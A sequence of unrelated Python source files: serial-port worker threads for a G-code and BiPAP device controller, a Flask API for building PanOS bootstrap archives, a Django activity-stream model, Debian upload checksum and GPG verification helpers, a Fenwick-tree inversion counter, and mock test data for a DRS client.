                    if self.gcode_exec_state == GcodeStates.WAIT_FOR_TIMEOUT:
                        # fixed 0.15 s budget per move before sending the next one
                        if (time.perf_counter() - self.Tic) >= 0.15:
                            #print("Gcode Executed\r\n")
                            self.gcode_exec_state = GcodeStates.READY_TO_SEND
                elif self.startdelay > 0:
                    # deferred start requested via StartMovingAfter()
                    time.sleep(self.startdelay)
                    self.startdelay = -1
                    self.pause = False
            except serial.SerialException as ex:
                print("Error In SerialException" + str(ex.strerror))
class EncoderThread(QObject):
    """Worker that forwards encoder lines read from a serial port.

    Each ascii line received is emitted unmodified via ``signal_pass_encoder``.
    """
    signal_pass_encoder = Signal(str)
    def __init__(self, serialport):
        self.rec_bytecount = 0
        self.line = []
        self.rec_data = ""
        self.flagStop = False
        self.serialport = serialport
        #self.thread = QThread()
        #self.thread.started.connect(self.run)
        #self.signal_pass_encoder.connect(callback)
        #self.moveToThread(self.thread)
        #self.thread.start()
        super().__init__()
    def Stop(self):
        """Request the run() loop to exit."""
        self.flagStop = True
    @Slot()
    def run(self):
        """Poll the port and emit each decoded line until stopped."""
        while True:
            if self.flagStop:
                break
            # wait until at least one byte is available
            in_waiting = self.serialport.in_waiting
            while in_waiting == 0:
                time.sleep(0.05)
                in_waiting = self.serialport.in_waiting
            # BUG FIX: lst was previously unassigned (or stale) when
            # readlines() raised, causing a NameError / duplicated emits in
            # the loop below. Reset it every iteration before reading.
            lst = []
            try:
                lst = self.serialport.readlines()
            except Exception:
                pass  # best-effort behaviour preserved: drop this read, retry
            for itm in lst:
                try:
                    self.signal_pass_encoder.emit(itm.decode('ascii'))
                except UnicodeDecodeError:
                    pass  # ignore undecodable bytes
'''
for char in self.serialport.read():
self.line.append(chr(char))
if chr(char) == '\n':
self.rec_data = "".join(self.line)
self.line.clear()
self.signal_pass_encoder.emit(self.rec_data)
#print(self.rec_data)
'''
'''
class WorkerThread(QObject):
signal = Signal(str)
def __init__(self, serialPort, codegen, commandque:Queue):
self.serialPort = serialPort
self.codegen = codegen
self.commandque = commandque
self.codelist = self.codegen.gcodestr.splitlines()
self.linecount = len(self.codelist)
self.flagexit = False
self.flagStop = False
super().__init__()
self.respondQue = Queue()
def Stop(self):
self.flagStop = True
def Resume(self):
self.flagStop = False
def updateGcode(self, codegen):
self.codegen = codegen
self.codelist = self.codegen.gcodestr.splitlines()
@Slot()
def run(self):
lst = []
while 1:
if self.flagStop:
time.sleep(1)
if self.respondQue.qsize() <= 0:
self.respondQue.put("stopped")
continue
if self.commandque.qsize() > 0:
if self.commandque.get() == "exit":
self.flagexit = True
break
try:
for line in self.codelist:
self.serialPort.write((str(line)+"\r\n").encode('utf-8'))
time.sleep(0.1)
in_waiting = self.serialPort.in_waiting
while in_waiting == 0:
time.sleep(0.5) #1
in_waiting = self.serialPort.in_waiting
jMessage = ""
while "ok" not in jMessage:
while self.serialPort.in_waiting:
lst = self.serialPort.readlines()
for itm in lst:
jMessage += itm.decode('ascii')
self.signal.emit(str(line) + " - " + jMessage)
except serial.SerialException as ex:
print("Error In SerialException" + str(ex))
'''
class WorkerThread(QObject):
    """Worker that cycles the G-code program until told to stop or exit.

    Sends every line of ``codelist``, waiting for an 'ok' acknowledgement
    after each, and repeats the whole program forever (or ``cycleToRun``
    times when set). Emits ``signal`` with "<gcode> - <reply>" per line.
    """
    signal = Signal(str)
    def __init__(self, serialPort, codegen, commandque:Queue):
        self.serialport = serialPort
        self.codegen = codegen
        # commandque: accepts "exit" to terminate the run() loop
        self.commandque = commandque
        self.codelist = self.codegen.gcodestr.splitlines()
        self.linecount = len(self.codelist)
        self.flagexit = False
        self.flagStop = False
        # 0 means run forever; >0 caps the number of full program cycles
        self.cycleToRun = 0
        self.cycleCount = -1
        super().__init__()
        # run() posts "stopped" here while paused so callers can confirm
        self.respondQue = Queue()
    def Stop(self):
        """Pause the loop (run() keeps polling but sends nothing)."""
        self.flagStop = True
    def Resume(self):
        """Resume a paused loop."""
        self.flagStop = False
    def updateGcode(self, codegen, cycleToRun=0):
        """Swap in a new program and optionally cap the cycle count."""
        self.cycleToRun = cycleToRun
        self.codegen = codegen
        self.codelist = self.codegen.gcodestr.splitlines()
    @Slot()
    def run(self):
        jMessage:str = ""
        unit:bytes = b''
        itm:str = ''
        in_waiting:int = 0
        while 1:
            if self.cycleToRun > 0:
                #print( self.codegen.gcodestr + ' :: cycleToRun : ' + str(self.cycleToRun))
                # cycle cap reached: idle instead of sending more G-code
                if (self.cycleCount >= self.cycleToRun):
                    time.sleep(1)
                    continue
                else:
                    self.cycleCount += 1
                    if self.cycleCount == self.cycleToRun:
                        print( self.codegen.gcodestr + ' :: cycleToRun : ' + str(self.cycleToRun))
            if self.flagStop:
                time.sleep(1)
                if self.respondQue.qsize() <= 0:
                    self.respondQue.put("stopped")
                continue
            if self.commandque.qsize() > 0:
                if self.commandque.get() == "exit":
                    self.flagexit = True
                    break
            try:
                for line in self.codelist:
                    self.serialport.write((str(line)+"\r\n").encode('utf-8'))
                    time.sleep(0.5)
                    jMessage = ''
                    # wait for the 'ok' acknowledgement before the next line
                    while 'ok' not in jMessage:
                        try:
                            in_waiting = self.serialport.in_waiting
                        except Exception as e:
                            print('Ex:0X17 : ' + str(e))
                        '''
                        while in_waiting == 0:
                            time.sleep(0.05)
                            try:
                                in_waiting = self.serialport.in_waiting
                            except Exception as e:
                                print('Ex:0x18 : ' + str(e))
                        '''
                        try:
                            while in_waiting == 0:
                                time.sleep(0.02)
                                in_waiting = self.serialport.in_waiting
                            unit = self.serialport.read(in_waiting)
                        except Exception as e:
                            print('Ex in sensor Thread readline() 392 : ' + str(e))
                        if len(unit) > 0:
                            try:
                                itm += unit.decode('ascii')
                            except:
                                pass
                        #else:
                        #    time.sleep(0.1)
                        # a newline terminates one reply message
                        if b'\n' in unit:
                            jMessage = itm #.decode('ascii')
                            itm = ''
                            self.signal.emit(str(line) + " - " + jMessage)
                            if 'ok' not in jMessage:
                                pass
                        #time.sleep(0.01)
            except serial.SerialException as ex:
                print("Error In SerialException WorkerThread L- 410 : " + str(ex))
class BipapWorkerThread(QObject):
    """Worker that cycles the BiPAP G-code program until told to exit.

    Same protocol as WorkerThread but uses readlines() instead of raw
    read() and has no cycle cap. Emits "<gcode> - <reply>" per line.
    """
    signal = Signal(str)
    def __init__(self, serialPort, codegen, commandque:Queue):
        self.serialPort = serialPort
        self.codegen = codegen
        # commandque: accepts "exit" to terminate the run() loop
        self.commandque = commandque
        self.codelist = self.codegen.gcodestr.splitlines()
        self.linecount = len(self.codelist)
        self.flagexit = False
        self.flagStop = False
        super().__init__()
        # run() posts "stopped" here while paused so callers can confirm
        self.respondQue = Queue()
    def Stop(self):
        """Pause the loop (run() keeps polling but sends nothing)."""
        self.flagStop = True
    def Resume(self):
        """Resume a paused loop."""
        self.flagStop = False
    def updateGcode(self, codegen):
        """Swap in a new G-code program."""
        self.codegen = codegen
        self.codelist = self.codegen.gcodestr.splitlines()
    @Slot()
    def run(self):
        lst = []
        while 1:
            if self.flagStop:
                time.sleep(1)
                if self.respondQue.qsize() <= 0:
                    self.respondQue.put("stopped")
                continue
            if self.commandque.qsize() > 0:
                if self.commandque.get() == "exit":
                    self.flagexit = True
                    break
            try:
                for line in self.codelist:
                    self.serialPort.write((str(line)+"\r\n").encode('utf-8'))
                    time.sleep(0.1)
                    # block until the controller starts replying
                    in_waiting = self.serialPort.in_waiting
                    while in_waiting == 0:
                        time.sleep(0.5) #1
                        in_waiting = self.serialPort.in_waiting
                    jMessage = ""
                    # accumulate reply text until 'ok' acknowledgement seen
                    while "ok" not in jMessage:
                        while self.serialPort.in_waiting:
                            lst = self.serialPort.readlines()
                            for itm in lst:
                                try:
                                    jMessage += itm.decode('ascii')
                                except:
                                    pass
                    self.signal.emit(str(line) + " - " + jMessage)
            except serial.SerialException as ex:
                print("Error In SerialException" + str(ex))
class SensorThread(QObject):
    """Worker that reads sensor CSV lines from serial and republishes them.

    Each newline-terminated ascii message is emitted whole via ``signal``;
    its first comma-separated field (presumably the pressure reading --
    confirm against the firmware) is pushed onto ``pressureque`` for the
    BiPAP threads.
    """
    signal = Signal(str)
    # last parsed message fields (class attribute, shared default)
    plst = []
    def __init__(self, serialPort, que):
        self.pressureque = que
        self.serialport = serialPort
        self.flagStop = False
        self.jMessage = ""
        self._beep = False
        # when set, ``strdata`` is written once to the port by run()
        self.flag_sensorlimit_tx = False
        self.strdata = ""
        super().__init__()
    def Stop(self):
        """Request the run() loop to exit."""
        self.flagStop = True
    def beep(self):
        """Set the beep flag (not acted on in the visible code)."""
        self._beep = True
    def txsensordata(self, strdata):
        """Queue a sensor-limit string for transmission from run()."""
        self.strdata = strdata
        self.flag_sensorlimit_tx = True
    @Slot()
    def run(self):
        in_waiting = ''
        jMessage = ""
        unit = ''
        itm = ''
        while 1:
            if self.flagStop:
                break
            try:
                in_waiting = self.serialport.in_waiting
            except Exception as e:
                print('Ex:0X07 : ' + str(e))
            # wait until at least one byte is available
            while in_waiting == 0:
                time.sleep(0.01)
                try:
                    in_waiting = self.serialport.in_waiting
                except Exception as e:
                    print('Ex:0x08 : ' + str(e))
            try:
                unit = self.serialport.read(in_waiting)
            except Exception as e:
                print('Ex in sensor Thread readline() 527 : ' + str(e))
            if len(unit) > 0:
                try:
                    itm += unit.decode('ascii')
                except:
                    pass
            # a newline terminates one sensor message
            if b'\n' in unit:
                jMessage = itm #.decode('ascii')
                itm = ''
                #jMessage += ',' + str(time.perf_counter())
                self.plst = jMessage.split(",")
                self.signal.emit(jMessage)
                # only publish when the queue is empty: consumers take one at a time
                if self.pressureque.qsize() <= 0:
                    self.pressureque.put(self.plst[0])
            if self.flag_sensorlimit_tx:
                self.flag_sensorlimit_tx = False
                self.serialport.write(self.strdata.encode('utf-8'))
                time.sleep(0.5)
|
python
|
from urllib.parse import unquote
from flask import Flask
from flask import Response
from flask import abort
from flask import jsonify
from flask import render_template
from flask import request
from flask import send_file
from werkzeug.exceptions import BadRequest
from bootstrapper.lib import archive_utils
from bootstrapper.lib import bootstrapper_utils
from bootstrapper.lib import cache_utils
from bootstrapper.lib.db import db_session
from bootstrapper.lib.db import init_db
from bootstrapper.lib.exceptions import RequiredParametersError
from bootstrapper.lib.exceptions import TemplateNotFoundError
app = Flask(__name__)
defaults = bootstrapper_utils.load_defaults()
config = bootstrapper_utils.load_config()
@app.route('/')
def index():
    """
    Default route, return simple HTML page
    :return: rendered index.html template
    """
    return render_template('index.html', title='PanOS Bootstrap Utility')
@app.route('/bootstrapper.swagger.json')
def api():
    """
    Serve the swagger definition for this API.

    :return: the static swagger json file
    """
    swagger_path = 'templates/bootstrapper.swagger.json'
    return send_file(swagger_path)
@app.route('/get/<key>', methods=['GET'])
def get_object_contents(key):
    """
    Get object from cache, useful to 'chain' together actions

    :return: raw contents stored in the cache under the given key
    """
    if not key:
        response = jsonify(message="Not all required params are present",
                           success=False, status_code=400)
        response.status_code = 400
        return response
    return Response(cache_utils.get(key))
@app.route('/set', methods=['POST'])
def set_object():
    """
    Adds an serializable object to the cache

    :return: json encoded string with dict containing key and success keys
    """
    posted_json = request.get_json(force=True)
    contents = posted_json.get('contents')
    if contents is None:
        response = jsonify(message="Not all required keys are present",
                           success=False, status_code=400)
        response.status_code = 400
        return response
    return jsonify(key=cache_utils.set(contents), success=True)
@app.route('/generate_bootstrap_package', methods=['POST'])
def generate_bootstrap_package():
    """
    Main function to build a bootstrap archive. You must post the following params:
    hostname: we cannot build an archive without at least a hostname
    deployment_type: openstack, kvm, vmware, etc.
    archive_type: zip, iso
    You must also supply all the variables required from included templates
    :return: binary package containing variable interpolated templates
    """
    try:
        posted_json = request.get_json(force=True)
        base_config = bootstrapper_utils.build_base_configs(posted_json)
    except (BadRequest, RequiredParametersError):
        abort(400, 'Invalid input parameters')
    except TemplateNotFoundError:
        # BUG FIX: corrected typo 'tempaltes' in the log message
        print('Could not load templates!')
        abort(500, 'Could not load template!')
    # if desired deployment type is openstack, then add the heat templates and whatnot
    if 'deployment_type' in posted_json and posted_json['deployment_type'] == 'openstack':
        try:
            base_config = bootstrapper_utils.build_openstack_heat(base_config, posted_json, archive=True)
        except RequiredParametersError:
            abort(400, 'Could not parse JSON data')
    if 'hostname' not in posted_json:
        abort(400, 'No hostname found in posted data')
    # if the user supplies an 'archive_type' parameter we can return either a ZIP or ISO
    archive_type = posted_json.get('archive_type', 'zip')
    # user has specified they want an ISO built
    if archive_type == 'iso':
        archive = archive_utils.create_iso(base_config, posted_json['hostname'])
        mime_type = 'application/iso-image'
    else:
        # no ISO required, just make a zip
        archive = archive_utils.create_archive(base_config, posted_json['hostname'])
        mime_type = 'application/zip'
    print("archive path is: %s" % archive)
    if archive is None:
        abort(500, 'Could not create archive! Check bootstrapper logs for more information')
    return send_file(archive, mimetype=mime_type)
@app.route('/get_bootstrap_variables', methods=['POST'])
def get_bootstrap_variables():
    """
    Compile the set of variables a caller must supply to build a valid
    bootstrap archive for the requested templates.

    :return: json with 'success', 'payload' and 'status_code' keys
    """
    print('Compiling variables required in payload to generate a valid bootstrap archive')
    posted_json = request.get_json(force=True)
    vs = bootstrapper_utils.get_bootstrap_variables(posted_json)
    payload = dict()
    bootstrap_template = posted_json.get('bootstrap_template')
    if bootstrap_template is not None:
        print('Using bootstrap %s' % bootstrap_template)
        payload['bootstrap_template'] = bootstrap_template
    else:
        print('No bootstrap file requested')
    init_cfg_template = posted_json.get('init_cfg_template')
    if init_cfg_template is not None:
        print('Setting init_cfg_name')
        payload['init_cfg_template'] = init_cfg_template
    else:
        print('No init_cfg file requested')
    # 'aframe' format returns jinja-style placeholders instead of blanks
    aframe = posted_json.get('format') == 'aframe'
    for v in vs:
        payload[v] = "{{ %s }}" % v if aframe else ""
    return jsonify(success=True, payload=payload, status_code=200)
@app.route('/import_template', methods=['POST'])
def import_template():
    """
    Imports a template into the configuration.

    :return: json with 'success', 'message' and 'status' keys
    """
    posted_json = request.get_json(force=True)
    try:
        name = posted_json['name']
        encoded_template = posted_json['template']
        description = posted_json.get('description', 'Imported Template')
        template_type = posted_json.get('type', 'bootstrap')
    except KeyError:
        print("Not all required keys are present!")
        response = jsonify(message="Not all required keys for add template are present",
                           success=False, status_code=400)
        response.status_code = 400
        return response
    # templates are posted url-encoded
    template = unquote(encoded_template)
    print('Importing template with name: %s' % name)
    print('Importing template with description: %s' % description)
    print(template)
    if bootstrapper_utils.import_template(template, name, description, template_type):
        return jsonify(success=True, message='Imported Template Successfully', status_code=200)
    response = jsonify(success=False,
                       message='Could not import template repository to the configuration',
                       status_code=500)
    response.status_code = 500
    return response
@app.route('/delete_template', methods=['POST'])
def delete_template():
    """
    Removes a template from the configuration.

    :return: json with 'success', 'message' and 'status' keys
    """
    posted_json = request.get_json(force=True)
    try:
        name = posted_json['template_name']
    except KeyError:
        print("Not all required keys are present!")
        response = jsonify(message="Not all required keys for add template are present",
                           success=False, status_code=400)
        response.status_code = 400
        return response
    if bootstrapper_utils.delete_template(name):
        return jsonify(success=True, message='Deleted Template Successfully', status_code=200)
    response = jsonify(success=False, message='Could not delete template', status_code=500)
    response.status_code = 500
    return response
@app.route('/list_templates', methods=['GET'])
def list_templates():
    """Return all known bootstrap templates."""
    templates = bootstrapper_utils.list_bootstrap_templates()
    return jsonify(success=True, templates=templates, status_code=200)
@app.route('/get_template', methods=['POST'])
def get_template():
    """Return the raw contents of a named template as plain text."""
    posted_json = request.get_json(force=True)
    if 'template_name' not in posted_json:
        print("Not all required keys are present!")
        response = jsonify(message="Not all required keys for add template are present",
                           success=False, status_code=400)
        response.status_code = 400
        return response
    contents = bootstrapper_utils.get_template(posted_json['template_name'])
    return Response(contents, mimetype='text/plain')
@app.route('/list_init_cfg_templates', methods=['GET'])
def list_init_cfg_templates():
    """Return all known init-cfg templates."""
    templates = bootstrapper_utils.list_init_cfg_templates()
    return jsonify(success=True, templates=templates, status_code=200)
@app.teardown_appcontext
def shutdown_session(exception=None):
    # Release the scoped SQLAlchemy session at the end of each request.
    db_session.remove()
@app.before_first_request
def init_application():
    # One-time setup: create DB schema and load bundled templates.
    init_db()
    bootstrapper_utils.import_templates()
# Development entry point; in production the app is served by a WSGI server.
if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0')
|
python
|
# stream.models
# Database models for the Activity Stream Items
#
# Author: Benjamin Bengfort <[email protected]>
# Created: Wed Feb 04 10:24:36 2015 -0500
#
# Copyright (C) 2016 District Data Labs
# For license information, see LICENSE.txt
#
# ID: models.py [70aac9d] [email protected] $
"""
Database models for the Activity Stream items
"""
##########################################################################
## Imports
##########################################################################
from django.db import models
from model_utils import Choices
from django.utils.timesince import timesince
from minent.utils import nullable, notnullable
from stream.managers import StreamItemManager
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey
from django.utils import timezone as datetime
##########################################################################
## Activity Stream models
##########################################################################
class StreamItem(models.Model):
    """
    Contains a relationship between a user and any other content item via
    a Generic relationship. It can then be used to describe an action
    model as follows:
        <actor> <verb> <time>
        <actor> <verb> <target> <time>
        <actor> <verb> <theme> <target> <time>
    For example:
        <bbengfort> <logged in> <1 minute ago>
        <mcox> <asked> <question> <2 hours ago>
        <dperlis> <annotated> <topic> on <question> <a day ago>
    Much of this data type is created automatically (e.g. not interacted
    with by users except through views). A secondary table is used to
    store the activity stream to ensure that it can be quickly loaded,
    even though many of the items in question already have a relationship
    to some user!
    """
    ## Potential actions (verbs) for the activity stream
    ## DB storage is the infinitive, display is past tense
    VERBS = Choices(
        ('join', 'joined'),
        ('view', 'viewed'),
        ('upvote', 'up voted'),
        ('downvote', 'down voted'),
        ('ask', 'asked'),
        ('answer', 'answered'),
    )
    ## Relationship to the user (the actor)
    actor = models.ForeignKey( 'auth.User', related_name='activity_stream' ) # The actor causing the event
    ## Generic relationship to a target
    target_content_type = models.ForeignKey( ContentType, related_name="targets", **nullable )
    target_object_id = models.PositiveIntegerField( **nullable )
    target = GenericForeignKey( 'target_content_type', 'target_object_id' )
    ## Generic relationship to a theme (action object)
    theme_content_type = models.ForeignKey( ContentType, related_name="themes", **nullable )
    theme_object_id = models.PositiveIntegerField( **nullable )
    theme = GenericForeignKey( 'theme_content_type', 'theme_object_id' )
    ## Meta data concerning the activity
    public = models.BooleanField( default=True ) # May appear in public feeds?
    verb = models.CharField( max_length=20, choices=VERBS ) # The "verb" or "action" or "event"
    details = models.TextField( **nullable ) # Additional details about the action
    timestamp = models.DateTimeField( default=datetime.now, db_index=True ) # The timestamp of the action (note no created and modified)
    ## A custom manager for the StreamItem
    objects = StreamItemManager()
    ## Database setup and meta
    class Meta:
        app_label = 'stream'
        db_table = 'activity_stream'
        ordering = ('-timestamp',)
        verbose_name = 'activity stream item'
        verbose_name_plural = 'activity stream items'
    ######################################################################
    ## Methods on the Stream Item
    ######################################################################
    def timesince(self, now=None):
        """
        Returns a string representation of the time since the timestamp.
        """
        return timesince(self.timestamp, now).encode('utf8').replace(b'\xc2\xa0', b' ').decode('utf8')
    def get_object_url(self, obj):
        """
        Returns the URL of an object by using the `get_absolute_url` method
        otherwise returns None. (Shouldn't raise an error).
        """
        if hasattr(obj, 'get_absolute_url'):
            return obj.get_absolute_url()
        return None
    def get_actor_url(self):
        """Returns the absolute URL of the actor, or None."""
        return self.get_object_url(self.actor)
    def get_target_url(self):
        """Returns the absolute URL of the target, or None."""
        return self.get_object_url(self.target)
    def get_theme_url(self):
        """Returns the absolute URL of the theme, or None."""
        # BUG FIX: previously called self.get_absolute_url(self.theme), a
        # method that does not exist on this model, raising AttributeError.
        # Route through the same helper the actor/target accessors use.
        return self.get_object_url(self.theme)
    def get_object_repr(self, obj):
        """
        Returns an HTML representation of an object, basically an anchor
        to the object's absolute URL or just the plain string representation.
        """
        # If the object knowns how to represent itself ...
        if hasattr(obj, 'get_stream_repr'):
            return obj.get_stream_repr()
        # Otherwise, simply return the string representation
        return str(obj)
    def __str__(self):
        context = {
            'actor': self.actor.username,
            'verb': self.get_verb_display(),
            'theme': self.get_object_repr(self.theme),
            'target': self.get_object_repr(self.target),
            'timesince': self.timesince(),
        }
        # Pick the sentence form that matches which relations are set
        if self.target:
            if self.theme:
                return "{actor} {verb} {theme} on {target} {timesince} ago".format(**context)
            return "{actor} {verb} {target} {timesince} ago".format(**context)
        if self.theme:
            return "{actor} {verb} {theme} {timesince} ago".format(**context)
        return "{actor} {verb} {timesince} ago".format(**context)
|
python
|
# files.py — Debexpo files handling functions
#
# This file is part of debexpo -
# https://salsa.debian.org/mentors.debian.net-team/debexpo
#
# Copyright © 2019 Baptiste Beauplat <[email protected]>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from os.path import basename, join, isfile
from os import replace, unlink
import hashlib
from debexpo.keyring.models import Key
from debexpo.tools.gnupg import GnuPG, ExceptionGnuPGNoPubKey
class ExceptionCheckSumedFile(Exception):
    """Base class for all checksummed-file errors raised by this module."""
    pass
class ExceptionCheckSumedFileNoFile(ExceptionCheckSumedFile):
    """Raised when a file listed with checksums is missing from the upload."""
    def __init__(self, e):
        # e: the original error (or message); stored as plain text
        self.message = str(e)
    def __str__(self):
        return self.message
class ExceptionCheckSumedFileNoMethod(ExceptionCheckSumedFile):
    """Raised when none of the supported checksum methods was provided."""
    def __init__(self, filename):
        self.filename = filename
    def __str__(self):
        return f'No checksum method available for file {self.filename}.'
class ExceptionCheckSumedFileFailedSum(ExceptionCheckSumedFile):
    """Raised when a file's computed checksum does not match the expected one."""
    def __init__(self, filename, expected, computed):
        self.filename = filename
        self.expected = expected  # digest declared in the upload
        self.computed = computed  # digest computed from the file on disk
    def __str__(self):
        return f'Checksum failed for file {basename(self.filename)}.\n\n' \
            f'Expected: {self.expected}\n' \
            f'Computed: {self.computed}'
class GPGSignedFile():
    """A GPG-signed file whose signature is verified against database keys."""
    def __init__(self, filename):
        self.filename = filename
        self.key = None  # Key used for verification; set by authenticate()
    def authenticate(self):
        """Verify the file's signature using a key from the Key table.

        Looks up the signing key's fingerprint (or long id) from a first
        verification attempt against an empty keyring, fetches the matching
        Key from the database, then re-verifies against that key. Raises the
        original ExceptionGnuPGNoPubKey when the key is not in the database.
        """
        lookup = self._lookup_fingerprint()
        # NOTE(review): if verify_sig succeeds against the fresh keyring,
        # _lookup_fingerprint returns None and the attribute access below
        # fails -- appears to rely on verify_sig always raising for an
        # unknown key; confirm against GnuPG wrapper semantics.
        try:
            if lookup.fingerprint:
                search = lookup.fingerprint
            else:
                search = lookup.long_id
            self.key = Key.objects.get_key_by_fingerprint(search)
        except Key.DoesNotExist:
            raise lookup
        self.keyring = GnuPG()
        self.keyring.import_key(self.key.key)
        self.keyring.verify_sig(self.filename)
    def _lookup_fingerprint(self):
        """Return the ExceptionGnuPGNoPubKey describing the unknown signer."""
        gpg = GnuPG()
        try:
            gpg.verify_sig(self.filename)
        except ExceptionGnuPGNoPubKey as e:
            return e
    def get_key(self):
        """Return the Key that verified the signature (None before authenticate())."""
        return self.key
class CheckSumedFile():
    """A file on disk together with its expected checksums.

    Checksums are registered via add_checksum() and verified by validate(),
    which re-reads the file from disk in chunks.
    """
    # Algorithms tried by validate(), in order; names must match hashlib
    # constructor names.
    METHODS = ('sha512', 'sha256')
    def __init__(self, filename):
        self.filename = filename
        self.checksums = {}  # method name -> expected hex digest
    # Two Checksumed files are considered equals if
    # at least one of their checksum is equal.
    # This does not perform any kind of file validation.
    def __eq__(self, other):
        for method in self.METHODS:
            if method in self.checksums.keys() and \
                    method in other.checksums.keys():
                if self.checksums[method] == other.checksums[method]:
                    return True
        return False
    def add_checksum(self, method, checksum):
        """Register an expected hex digest for the given hashlib method name."""
        self.checksums[method] = checksum
    def validate(self):
        """Verify the file against the first available checksum method.

        Returns True on the first matching digest. Raises
        ExceptionCheckSumedFileNoFile if the file is missing,
        ExceptionCheckSumedFileFailedSum on a mismatch, and
        ExceptionCheckSumedFileNoMethod if no supported checksum was given.
        """
        for method in self.METHODS:
            checksum = self.checksums.get(method)
            if checksum:
                hash_function = getattr(hashlib, method)
                validator = hash_function()
                try:
                    data = open(self.filename, 'rb')
                except FileNotFoundError:
                    raise ExceptionCheckSumedFileNoFile(
                        f'{basename(self.filename)} is missing from '
                        'upload')
                else:
                    # hash the file in 10 KiB chunks to bound memory use
                    with data:
                        while True:
                            chunk = data.read(10240)
                            if not chunk:
                                break
                            validator.update(chunk)
                    if validator.hexdigest() != checksum:
                        raise ExceptionCheckSumedFileFailedSum(
                            self.filename, checksum, validator.hexdigest()
                        )
                    else:
                        return True
        raise ExceptionCheckSumedFileNoMethod(self.filename)
    def __str__(self):
        return basename(self.filename)
    def move(self, destdir):
        """Move the file into destdir (atomic replace) and update filename."""
        if not isfile(self.filename):
            return
        dest = join(destdir, basename(self.filename))
        replace(self.filename, dest)
        self.filename = dest
    def remove(self):
        """Delete the file from disk if it still exists."""
        if isfile(self.filename):
            unlink(self.filename)
|
python
|
# -*- coding: utf-8 -*-
class BIT:
    """Fenwick tree (binary indexed tree) over 1-based positions 1..size."""

    def __init__(self, size: int) -> None:
        self.size = size
        # slot 0 is unused; tree nodes live at 1..size
        self._bit = [0] * (self.size + 1)

    def add(self, index: int, value: int) -> None:
        """Add ``value`` at position ``index`` (1-based)."""
        while index <= self.size:
            self._bit[index] += value
            # jump to the next node responsible for this position
            index += index & -index

    def sum(self, index) -> int:
        """Return the prefix sum over positions 1..index."""
        total = 0
        while index > 0:
            total += self._bit[index]
            # strip the lowest set bit to walk toward the root
            index -= index & -index
        return total
def main():
    """Read ``n`` and ``n`` integers from stdin and print the inversion count.

    Values are assumed to lie in 1..n (BIT positions are 1-based; a value
    of 0 would never terminate in BIT.add) -- the usual contract for this
    kind of task, but worth confirming against the input spec.
    """
    n = int(input())
    values = [int(token) for token in input().split()]
    tree = BIT(n)
    inversions = 0
    for position, value in enumerate(values, 1):
        tree.add(value, 1)
        # `position` elements seen so far (current one included) and
        # tree.sum(value) of them are <= value, so the difference counts
        # the earlier, strictly greater elements -> inversions.
        inversions += position - tree.sum(value)
    print(inversions)


if __name__ == "__main__":
    main()
|
python
|
"""Mock input data for unit tests."""
from copy import deepcopy
import uuid
# no dependencies
MOCK_BASE_PATH = "a/b/c"
MOCK_DRS_URI = "drs://fakehost.com/SOME_OBJECT"
MOCK_DRS_URI_INVALID = "dr://fakehost.com/SOME_OBJECT"
MOCK_DRS_URI_LONG = (
"drs://aaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaa.com/SOME_OBJECT"
)
MOCK_ERROR = {
"msg": "mock_message",
"status_code": "400"
}
MOCK_ERROR_MSG = "SYSTEM HANDLER"
MOCK_ERROR_MSG_CUSTOM_HANDLER = "CUSTOM HANDLER"
MOCK_FILE_URL = "ftp://my.ftp.service/my_path/my_file_01.txt"
MOCK_HOST = "https://fakehost.com"
MOCK_ID = str(uuid.uuid4())
MOCK_PORT = 8080
MOCK_SELF_URI = f"https://fakehost.com/ga4gh/drs/v1/objects/{MOCK_ID}"
MOCK_TOKEN = "MyT0k3n"
# with dependencies
MOCK_ACCESS_URL = {
"url": MOCK_FILE_URL,
"headers": [
"None"
],
}
MOCK_ACCESS_METHODS = [
{
"type": "ftp",
"access_url": MOCK_ACCESS_URL,
},
]
MOCK_CHECKSUMS = [
{
"checksum": "18c2f5517e4ddc02cd57f6c7554b8e88",
"type": "md5",
},
]
MOCK_DRS_URL = f"{MOCK_HOST}:{MOCK_PORT}/ga4gh/drs/v1/objects"
MOCK_OBJECT_POST_INVALID = {
"updated_time": "2019-04-24T05:23:43-06:00",
"version": "1",
"size": 5,
"mime_type": "",
"checksums": MOCK_CHECKSUMS,
"access_methods": MOCK_ACCESS_METHODS,
}
MOCK_OBJECT_GET_INVALID = deepcopy(MOCK_OBJECT_POST_INVALID)
MOCK_OBJECT_GET_INVALID['id'] = MOCK_ID
MOCK_OBJECT_GET_INVALID['self_uri'] = MOCK_SELF_URI
